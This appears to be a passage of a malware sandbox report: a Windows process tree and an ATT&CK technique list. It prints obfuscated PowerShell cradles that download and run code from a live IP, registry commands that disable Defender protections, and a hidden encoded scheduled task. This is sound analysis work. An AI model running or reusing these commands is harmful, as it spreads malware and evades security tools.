                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:3132
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:5004
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4072 -ip 4072
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:648
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5116
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 460
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                  PID:1892
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3848
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    cmd
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1148
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 624
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:3272
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:332
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:5660
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:4240
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS78C2.tmp\Install.exe
                                                                                                                                                                                                                                                                                              .\Install.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:4152
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS992B.tmp\Install.exe
                                                                                                                                                                                                                                                                                                  .\Install.exe /S /site_id "525403"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:3600
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:5380
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:4896
                                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5772
                                                                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:3804
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:3988
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:2392
                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:4244
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:2532
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "gQVMhSGHG" /SC once /ST 00:37:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                      PID:3636
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /run /I /tn "gQVMhSGHG"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:5400
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4072 -ip 4072
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:3832
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5056 -ip 5056
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:448
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1220 -ip 1220
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:2956
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 480
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:2976
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 468
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:3736
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:5144
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4af5dee1-bf23-4767-a443-20337b6a8525.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\4af5dee1-bf23-4767-a443-20337b6a8525.exe"
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:2828
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 632
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:5232
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1220 -ip 1220
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:3104
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 460
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:2740
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5056 -ip 5056
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:2324
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:5880
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:5632
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4200 -ip 4200
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5516
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\efdituh
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\efdituh
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5228
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 344
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1476
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6132
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4196 -ip 4196
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:692
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5696
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5972 -ip 5972
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5292
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1780
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5972 -ip 5972
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5364
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3352 -ip 3352
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2880
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5972 -ip 5972
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1492
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5228 -ip 5228
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:6048
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1732
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5912 -ip 5912
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5564
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\qxlpzjol\yyfkqjsp.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\qxlpzjol\yyfkqjsp.exe /d"C:\Users\Admin\gbqmgigb.exe"
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5432
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2016
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 524
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3636
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5760 -ip 5760
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6092
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4200 -ip 4200
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5456
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5760 -ip 5760
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4808
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4200 -ip 4200
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4164
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5972 -ip 5972
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:2324
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5760 -ip 5760
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1088
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3868
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5432 -ip 5432
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4492
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6024
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5972 -ip 5972
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4200 -ip 4200
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1180
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5660 -ip 5660
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5704
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:5296
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1440 -ip 1440
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3852

                                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                            Downloads

